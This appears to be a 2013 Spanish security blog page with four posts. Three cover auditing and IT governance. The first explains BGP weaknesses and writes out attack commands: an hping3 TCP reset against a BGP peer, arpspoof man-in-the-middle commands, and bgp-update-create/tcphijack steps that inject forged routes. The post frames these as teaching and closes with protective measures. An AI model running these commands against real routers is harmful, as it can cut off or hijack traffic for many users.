Ads 468x60px

28 de octubre de 2013

BGP Attack


Realizar un ataque de denegación de servicio distribuido (DDoS) contra los DNS de una organización dejándolo inaccesible o atacar a un proveedor de DNS modificando los registros para redirigir las solicitudes a servidores ilegítimos son desde mi punto de vista dos ataques con un gran impacto. Sin embargo, debido a la antigüedad del protocolo BGP y a su funcionamiento sobre TCP es posible atacar a un sistema autónomo generando también un gran impacto, de hecho ya se dijo que Internet se podría apagar en 30 minutos debido a la fragilidad del protocolo. Vemos algunos de los ataques:
  • Realizar una denegación de servicio, es decir, un atacante podría descartar todo el tráfico de un segmento de red, por ejemplo Youtube, de tal manera que los usuarios pertenecientes al sistema autónomo atacado no puedan acceder al segmento descartado (Youtube), como pasó en Pakistan. Esto fue posible por el propio funcionamiento de BGP, ya que BGP siempre publica las rutas más específicas y en este caso Pakistan Telecom publicó una ruta más específica que Youtube, confundiendo a todos los routers de Internet y dejando inaccesible los servicios de Youtube.
  • Analizar el tráfico, para ello sería necesario hacerse con el control de uno de los routers del sistema autónomo atacado, o realizar un MITM.

  • Realizar ataques TCP Reset evitando la asociación de vecindad, aunque para ello es necesario conocer la IP y puerto origen de la asociación de vecindad:
hping3 -i eth0 -c 1000 --fast -a IP_vecino_Victima -s 57568 -R IP_Victima -p 179
  • Inyectar rutas ilegítimas en los routers BGP. Si no está debidamente protegida la asociación de vecinos en los routers BGP es posible utilizar herramientas como bgp-update-create y tcphijack para crear paquetes de Update y así inyectar las rutas que queramos en los routers BGP, vemos un ejemplo:
Realizamos un MITM:
arpspoof -i eth0 -t 1 IP_Victima IP_vecino_Victima
arpspoof -i eth0 -t IP_vecino_Victima IP_Victima

Construimos el payload, es decir el paquete Update de BGP:
./bgp-update-create --as AS_Atacado --nexthop 192.168.10.1 --destnet 192.168.15.1/24 > evilpacket

Enviamos el paquete Update al router atacado
./tcphijack -c IP_vecino_Victima -s IP_Victima -p 179 -P evilpacket

A continuación podemos ver el paquete Update, capturado con wireshark:

 
Como vemos, BGP no es inmune a los ataques ya que hereda todos los problemas de seguridad de TCP, por este mismo motivo es importante configurar adecuadamente la distribución de rutas y asociación de vecinos autenticando los mensajes, aplicando filtros, etc ya que una configuración errónea o un despiste puede tener repercusiones en toda Internet. Por el momento hay varios proyecto para asegurar las comunicaciones BGP, como el proyecto Secure BGP (S-BGP) que utiliza infraestructura PKI, esperemos que algún día sea una realidad.

21 de octubre de 2013

El proceso de Auditoría


En la entrada de Auditorías de Sistemas de la Información comentaba brevemente las fases por la que está compuesta una auditoría, en esta nueva entrada voy a profundizar en cada una de las etapas por la que pasa la auditoría:

Definición y aprobación de la auditoría
La junta directiva autoriza la auditoría, se definen las responsabilidades, los objetivos y el alcance de la auditoría.

Preplanificación de la auditoría
Una vez firmado el contrato de auditoría se analiza si el objetivo es el cumplimiento de un determinado estándar o la supervisión de algún control concreto. Además, se especifica el tipo de auditoría, se comprueba si hay restricciones en el alcance y se obtienen todos los requerimientos de manera detallada.

Análisis de riesgos de la auditoría
Una vez identificado los objetivos de la auditoría se valoran los riesgos con el propósito de asegurarnos que es posible obtener suficientes evidencias durante la auditoría, para ello hay que detectar los riesgos y tener en cuenta riesgos tecnológicos, operacionales, etc. Por ejemplo hay que tener alternativas si el auditado no nos puede atender porque se haya producido una interrupción no planificada en su servicio.

¿Es posible realizar la auditoría?
Si tras realizar el análisis de riesgos no se ve la posibilidad de obtener evidencias significativas, la auditoría sería inútil por lo que hay que ponerlo en conocimiento del comité de auditoría. Si por el contrario la auditoría es factible, continuaremos con la ejecución de la auditoría.

Ejecución de la auditoría
En esta fase debemos estar seguros de contar con el personal apropiado para realizar la auditoría, probablemente se necesiten auditores expertos en una determinada materia, al igual que técnicos expertos en una tecnología concreta. También hay que asegurar la calidad de la auditoría, definir el método de comunicación con el auditado, obtener los datos adecuados y revisar los controles existentes.

Obtención de evidencias
Obtener evidencias fiables es importante para aprobar o desaprobar un control interno. La ausencia de evidencias es la ausencia de pruebas. Para conseguir evidencias podemos obtener muestras de mayor o menor tamaño y analizarlas manualmente o mediante alguna herramienta de auditoría informática. Una vez obtenidas las evidencias hay que clasificarlas y siempre cumplir la cadena de custodia de las evidencias para que tengan validez durante todo el proceso de auditoría.

Realizar pruebas con las evidencias
Una vez encontradas evidencias fiables es importante que los resultados de las pruebas realizadas con las evidencias sean siempre los mismos, y que las pruebas puedan ser repetidas por otro auditor obteniendo los mismos resultados. De esta manera la detección de actos ilegales e irregulares como el fraude, robos, crimen organizado o violación de las leyes puede ser probado una y otra vez con las evidencias obtenidas.

Escribir informe
Consiste en redactar el informe de auditoría donde aparecerá el alcance, los objetivos, los métodos utilizados y las evidencias obtenidas. El informe debe ser fácil de leer con gráficas simples, tablas, colores, etc. Podrá ir acompañado de una opinión. Además es importante que el auditor firme el informe alegando que las datos y evidencias obtenidas son verdades y correctas. El informe debe ser aprobado y compartido sólo con el personal auditado.

Realizar seguimientos
Tras la entrega del informe puede haber reuniones de seguimiento para comprobar si la organización auditada a subsanado los problemas encontrados, o por el contrario pueden aparecer nuevas evidencias agravando aún más la situación de la organización.

Ya conocemos los pasos a seguir en una auditoría, ahora tan solo queda adaptarlo a nuestro campo de acción, los sistemas de información.

14 de octubre de 2013

Gobierno de TI


En la anterior entrada hablamos sobre las Auditorías de Sistemas de la Información e hicimos mención a la importancia de conocer la estructura de la organización a auditar. En esta entrada quiero hacer referencia a lo más alto de la jerarquía organizacional de TI, es decir al Gobierno de TI, cuál es su función, cómo controlan la organización y a alguna de las decisiones que llevan a cabo, como puede ser la externalización.

El Gobierno de TI es el encargado de definir los planes estratégicos de TI alineándolos con los objetivos de negocio fijados por la junta directiva y el CEO de la compañía.

Todas las compañías cambian, evolucionan y tienen que adaptar su misión, estrategia y métricas a los nuevos tiempos, para ello es importante que el Gobierno de TI use el cuadro de mandos utilizado por el CEO donde se define detalladamente los objetivos de negocio, de esta manera el Gobierno de TI podrá alinear las políticas estratégicas de TI con los objetivos de negocio. Además mediante el análisis GAP, el Gobierno de TI puede medir y controlar el estado actual con los objetivos finales para conocer en todo momento el estado de cumplimiento de los objetivos marcados. Todo esto suena muy bonito, pero definir los objetivos y estrategias en un cuadro de mandos en el cual puedan apoyarse los directores de las distintas áreas de la organización es un proceso laborioso y complicado de llevar a cabo que pocas compañías consiguen realizar satisfactoriamente.

A veces se tiende a pensar en la externalización como método de ahorro de costes y mejora de la productividad. Sin embargo antes de externalizar hay que plantearse una serie de preguntas, ya que la principal desventaja de la externalización es la pérdida de control sobre el servicio externalizado, aunque siempre podemos auditar al proveedor mediante un auditor con total independencia del proveedor y de la empresa contratante de la auditoría. Entre las preguntas a realizar antes de externalizar estarían las siguientes ¿es algo que la organización no puede/sabe hacer con los recursos disponibles? ¿hay alguna ventaja al externalizar? ¿actualmente la ejecución del servicio in-house es una ventaja competitiva? En el caso de externalizar, ¿dónde se realizarán las tareas? ¿en el mismo edificio? ¿en otro edificio? ¿en otro país? En definitiva la externalización es un asunto en el que no solo debemos evaluar el coste. Por ejemplo, en EEUU hay muchas empresas dedicadas a la moda y aunque fabricar las prendas de vestir en EEUU les cuesta más dinero que si lo hiciesen en otro país, tienen la principal ventaja que tras hacer el diseño de una prenda, la confeccionan y al día siguiente la tienen puesta en el escaparate a disposición de los clientes.

La externalización de servicios daría para una o varias entradas completas ya que aún no hemos tocado la calidad del servicio externalizado, en quién cae la responsabilidad del servicio, los problemas regulatorios al externalizar, cómo aplicar controles, cómo medir el rendimiento del servicio externalizado, acuerdos de nivel de servicio, etc, etc. Así que me lo apunto para futuras entradas.

¿Has externalizado algún servicio? ¿qué problemas te has encontrado? Cuéntanos tu experiencia.

7 de octubre de 2013

Auditoría de Sistemas de la Información


Inicialmente las auditorías se realizaban en grandes organizaciones para controlar el dinero que entraba y salía de las compañías, y así intentar evitar fraudes financieros. El auge de las auditorías comenzó con las auditorías financieras en los bancos y cajas para analizar y vigilar las transacciones, cuentas anuales, balances, etc. Sin embargo el creciente uso de las tecnologías de la información ha provocado que no solo haya que auditar los estados financieros sino también los sistemas de la organización, por el mero hecho de que la información está alojada en sistemas informáticos que deben ser auditados para comprobar si cumplen los estándares y las leyes existentes.

Existen dos tipos de auditores, internos y externos. Los auditores internos auditan la organización para la que trabajan por lo que el proceso de auditoría es rápido ya que éste conoce la compañía auditada, sin embargo el auditor interno no puede mantener la independencia, ya que puede haber participado en la elaboración y creación del sistema de información, y por tanto los resultados de la auditoría pueden estar condicionados por su posición en la empresa auditada. Los auditores externos son aquellos que no tienen ningún tipo de contrato laboral con la compañía auditada por lo que se mantiene la independencia en los resultados de la auditoría. Además otro punto a tener en cuenta es que el cliente de la auditoría, es decir el que paga la auditoría, puede ser el propio auditado o un tercero.

Es importante que el auditor conozca las leyes y regulaciones que debe cumplir la organización auditada, así que éste está constantemente en contacto con abogados. Además ante la obtención de alguna evidencia que pueda poner al responsable de la organización en un aprieto, es importante consultar a un abogado para conocer si existe alguna multa o pena.

Una auditoría está compuesta por varias fases. La primera fase es la de planificación, probablemente la más importante, donde hay que priorizar las tareas y tener claro a qué personas es necesario entrevistar durante la auditoría, para ello hay que conocer la estructura de la organización y ser conscientes que las entrevistas con directores deben ser cortas y directas, ya que los directivos disponen de muy poco tiempo para este tipo de trabajos. Tras la obtención y prueba de evidencias hay que redactar el informe final que debe ser claro y no estar abierto a interpretaciones, es decir, cada evidencia encontrada que no cumpla el estándar o ley a auditar debe ser referenciada al apartado o control exacto donde se indica el por qué de la evidencia o no conformidad.

Debido a la importancia que tiene el informe final de la auditoría, ya que éste puede desencadenar acciones desagradable para algún departamento o persona, como puede ser el despido, es importante que el auditor proteja la documentación de la auditoría y mantenga la confidencialidad de la información obtenida.

Así que si quieres demostrar que cumples algún estándar, deja que algún auditor externo audite tu organización y te diga lo bien o mal que lo estás haciendo.

Related Posts Plugin for WordPress, Blogger...

Entradas populares